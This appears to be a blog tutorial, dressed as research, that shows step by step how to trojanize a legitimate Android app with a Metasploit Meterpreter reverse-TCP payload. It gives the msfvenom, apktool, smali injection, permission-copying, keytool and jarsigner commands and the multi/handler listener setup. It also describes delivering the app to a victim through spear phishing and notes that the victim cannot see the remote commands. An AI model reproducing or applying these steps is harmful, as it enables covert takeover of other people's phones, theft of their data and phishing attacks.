Exploit an Android device using payload injected APK
Android is an operating system that was developed by
Open Handset Alliance. Mainly it is based on the Linux
kernel. Android is the most commonly used OS to develop
portable devices including smartphones. The main reason for
this is the good features, performance of Android.
Smartphones provide many services such as Internet services,
phone calls, social networking apps,video calls,
storing and sharing files messaging, etc. So we have to be
much aware of the security and the safety of android devices.
The android developer provides security in the form of
authentication mechanisms such as fingerprints, face
detection, passcode, or patterns Even though some safety
features are present in Android devices to prevent viruses and
malware, they are less secure.
Exploitation is a feature to find out vulnerabilities. It is a
malicious form of code that can take advantage of a
vulnerability in an operating system or a software without
users' permission. To do this exploitation we choose a mobile
device that runs Android operating system. MSFvenom and
Metasploit framework are combined to exploit an Android
device. MSFvenom is used to create payload and The Metasploit framework used to exploit the android device. In
addition to that, apktool, keytool, jarsigner are support to
inject a payload to an original android package (APK).
msfvenom - The Msfvenom is a feature of Metasploit which
utilize to generate payloads and output all of the various types
of shellcode that are available in Metasploit. The offensive
security states that MSFvenom is a combination of
Msfpayload and Msfencode combine both of these tools into
a single Framework instance [1]. In this research, we use
MSFvenom to create the payload which we need to inject into
the original android package.
Payload -The payload can be considered as a virus containing
malicious codes that executing activities to harm the targeted
device or software. worm and ransomware are common
examples for malicious payloads. In this research, we use a
payload to exploit the targeted android device.
APKtool - APKtool is a utility that can be used to reverse
engineering android packages (APK). Decoding APK to its
original form and rebuild the decoded resources back to an
APK is the main task that can be done by Utilizing APKtool.
Metasploit - Metasploit is a powerful framework that makes
hacking simple. It is a Ruby-based framework. It contains a
set of tools that can be used to test vulnerabilities and execute
attacks and avoid detections. In this research, we use
Metasploit to set up listener and retrieve data from the
targeted device.
Keytool - Keytool is a feature to manage keys and certificates.
This feature enables to administrate their private and public
key pairs to its users. in this research, we utilize keytool to
certify the malicious apk that we are going to send the
victim's device.
Jarsigner -Jarsigner is a feature to generate digital signatures
for jar files. It uses key and certificate information from
Keystore to generate digital signatures. In this research, we
use jarsigner feature to sign our malicious apk.
Join Telegram Channel For More Stuff: Telegram
Install Metasploit In Your Kali Machine:-
Step 1 – Create a Payload using MSFvenom
To exploit victim’s device the main component that attacker
wants is the payload. It can be created by using MSFvenom.
msfvenom -p android/meterpreter/reverse_tcp
LHOST=192.168.43.15 LPORT=5555 R > payload.apk
in this code segment -p is used to create payload. Payload
type is android, and the method is reverse TCP. Localhost IP
should be assigned to Lhost and Lport should be set as the
port number that attacker wishes to assign to the listener. R>
denotes the path to the payload to be created and payload is
the given name for this payload.
Step 2 – Decode payload using Apktool
To change the permissions and add smali files of the apk that
we want to send to the victim’s phone, first the source code
and smali files of the payload should be accessible. To do
that, payload should be decoded using Apktool. After
entering this code segment, all the resources of the payload
will be decoded into a folder.
apktool d payload.apk
d stands for decode and payload.apk is the payload that
needed to be decoded.
Step 3 – Download an original APK
An original APK can be downloaded from websites which
provide APK versions of genuine applications.
Step 4 – Decode an original APK
To change permissions, add assembly files, and change
mainactivity file, original APK that downloaded previously
should be decoded using Apktool. After entering this code
segment, all the resources of the original APK will be
decoded into a folder.
apktool d runbird.apk
inhere runbird.apk is the original APK that selected for this
exploitation.
Step 5 – Edit the mainactivity file
The Mainactivity file is doing a major role in an application.
It is a java code file. Mainactivity file defines the first activity
of an application: the first screen of the application.
Step 5.1 – find the path to the mainactivity file
Path and the name of the mainactivity file can be varied. The
correct name and path of the mainactivity file can be found in
the Androidmanifest XML file which contains all the important information about the application such as
permissions. Main activity is the first interface launching
when a user open the application for the first time. Path to the
main activity file can always be found above the main
command in androidmanifest XML file.
mainactivity file. Splashctivity is the name of mainactivity
file in this example.
Step 5.2 – enter the payload launching code to mainactivity file
After finding the mainactivity file, payload launching code
segment should be added as a oncreate method to the
mainactivity file. Oncreate method is used to set the
invoke-static {p0}, Lcom/metasploit/stage/Payload;-
>start(Landroid/content/Context;)V
Since we created a function in mainactivity file mentioning
the payload.smali file, that file should be copied from the
payload file structure to the original application file structure.
That can be done by using cp command.
cp -r payload/smali/com/* runbird/smali/com/
in this code segment cp is used to copy -r is to recursive
copy of all files and directories in source directory tree.
As attackers, we need to have some permissions to be
approved by the victim user. That can be done by adding new
permissions to the androidmanifest file of original apk. All
the permission needed to do the exploitation is containing in
the androidmanifest file of payload. Simply we can copy that
permissions and paste it in androidmanifest file of original
application. But androidmanifest file is already having some
permissions. We need to make sure that there will not be any
duplicated permissions.
After adding payload.smail files to original APK and after
adding new permissions., all the files belongs to the targeted
APK should be rebuilt as a APK using apktool.
apktool b runbird
b stands for build and runbird is the folder we want rebuild
as an APK. After rebuilding, rebuilt apk will store at
folder named dist.
Before send the malicious APK that created to the victim
user, that APK should be signed as a certified application.
Generating a key is the first step of certifying the APK. Key
can be created using Keytool.
keytool -genkey -v -keystore key1.keystore
alias kali -keyalg RSA -keysize 1024 -validity 22222
-genkey is used to generate a key, -keystore is used to define
the name of the key. -alias is to define the entity name to the
keystore. -keyalg is used to define the algorithm use to create the key. -keysize define size of the key and -validity define
the validity duration.
Step 10 – Sign apk using jarsigner
After creating the key, the malicious apk should be signed
using that key. To do that jarsigner tool can be used.
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -
keystore key1.keystore runbird.apk kali
-verbose is to verify the output. -sigalg define the algorithm
to sign. -digestalg define the digest algorithm. -keystore
define the path to the key generated at the previous step. Then
the name of apk should be added as well as the entity name
we gave at the previous step.
Sending the malicious apk to the victim’s phone can be done
by using many methods such as send it through a cable or
send it using a email. In this exploitation we use Social
Engineering tool kit and a link to download the apk to the
victim’s email address which knows as a spear phishing
attack.
Step 12 – Exploit victim’s device using MSFconsole
This is the last and most important step of this exploitation.
MSFconsole will be used throughout this step.
Step 12.1 – Setup the listener
To perform the exploitation. A listener should be created in
order to interact with the apk we sent to the victim’s device.
A listener can be created using msfconsole. By entering
msfconsole in kali terminal we can open up the msfconsole.
After open the msfconsole, multihandler should be created.
use exploit/multi/handler
Next step is to set the payload.
set payload android/meterpreter/reverce_tcp
Payload type is android and the method is reverse tcp.
Meterpreter is the shell that we use to perform the
exploitation.
Then lport and lhost should be configured.
set lport 5555
set lhost 192.168.43.15
By entering show options. Configuration settings can be seen
as this.
After creating the listener, we can enter give the command
exploit to start the exploitation.
in msfconsole.
By entering background we can send the session process to
the background. All the opened sessions can be seen using
sessions command.
This code segment can be used to interact with a session. -i is
for interacting and the session id. Once we get interact with
the session, we are accessible to the victim’s android device.
By entering -help we can see all the acts we can perform on
victim’s device. Once we enter a command, it will work on
victim’s device and victim will not be able to know about it,
since victim only see the application interface.
Join Telegram Channel For More Stuff: Telegram
THANK YOU